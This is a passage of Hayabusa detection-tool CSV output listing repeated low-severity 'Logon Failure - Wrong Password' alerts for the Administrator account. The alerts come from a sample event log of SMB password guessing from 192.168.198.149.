Wrong Password,User: Administrator | Type: 3 | Computer: 6PEs7fp97cYFf4vx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.781 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQelUX0kwLfpJnr0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.824 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t88CBspQqbiO1IPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.864 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zELW2Upo3jRCIqJk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.900 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfcyJGLYmu93JBIL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.940 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3t2nKPZHZvcXM3QA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.980 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oiDRonqdEM2YJvz9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.012 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wJPF4GUypkDkTz56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.060 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cd5YRVIoXx8LoYpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.106 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H49I2Xp2Gz1Jj0Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.143 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMSWWzskoRfYBGny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.190 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GLm2PolKMBsYkPnN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:30.280 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ZjHWhG2rXzYWskz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.325 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FOZzVedHYODB5Yvd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.372 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVaRybjI4HdZV0Zs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.411 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tTcl30MvvycjFcQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.449 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVZqbCr9EwmV4gNE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.504 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zVwhii0TVmCkpDI0 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.547 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Tx04CPPVa6WYY9G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.584 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gHyefIGqhIIy3ZI9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.627 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wrietoh4wgXcEvNd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.668 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9WW0Y5PW2JfCCdyR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.704 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmXsMJ0ELK4qiNY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.742 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeftUqriSoxCgmDy | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.769 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60JE9WQQ8N00j65B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.816 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0rt2yVAEH6V4IIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.852 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pay98C2Gr1di7qQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.881 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8TyPDYm9QCAmqj7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.927 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Dw3iK7DQMVXy8LW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.977 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
BMuO0QEkxpKRv4Vl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaHECaQDXCXQc9Xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.060 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ewXT2VcARiaNLIxJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.110 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGSTrm4AOojs7So0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.148 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wVTBSk0Q65LkaTqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.209 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NjFN51w3T4VwuWa5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: KG7a88h48ZEyOuYw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.292 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ksKuTSGukc5em3B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.336 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPEMcGV6ZR92sWNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.369 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iBQ6sKrRjb7BsySN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.421 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gDFnG1gv7jOeIQ0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.454 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdFKkcNpkfAScnkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.511 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: IAYbV4ioewwkZSmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.557 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bQ2Dxd6nlgSXJpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.596 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: havLyoVCfdCqzrqO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b2vZLhz19pXrq9iE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4TSN93DrSWb1ah4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.718 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QwFyrxiceLRTD9rI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.762 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: ARbqo84Mr5T3ltRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.901 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34HpQJO17IDWber9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.978 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bSSbqOtdSeH58oIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.009 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EMvTo7fU6J468WE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.051 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8gzx6Vr9LoInM1df | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwXC2S4HwdwNE6SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.136 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pQa1WxSt3bj9LEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.185 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fm65jq9tRQznmWPh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.237 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd8BJbXvEoaDADLc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.280 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P0JlFw7S6jFUt4Iy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.313 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rfMbFXQcP5sA2wmf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.349 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xu4pgyCcDjl9h0Et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:32.396 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B00w8dZG3sT2Lsqo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.450 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aKGq6qrchp4SLvT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.568 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnScYHBCKOSHItsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.610 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r8UMBM326M7a4njd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kTdYWOi6p7etRfya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.691 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JWSlcEVzj5lGtVg0 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.728 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xc77wukLTPOYAzj2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.769 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4WmTwTGuwDN6YXn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.817 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeN4cSffFA04oOje | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.849 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eYFPV1kGALqX8jyO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIlhxT4qqo5bCsU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.928 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: btoOskH0112h7MTO | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.972 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWUhQJBcS7XbMJUq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.004 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E70qmXDDWqmWJjyU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.047 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oX0L8wf6nt2grLvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.081 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0D8BwniiXsjfkYqE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.124 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSWYo4mphuvKHQHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
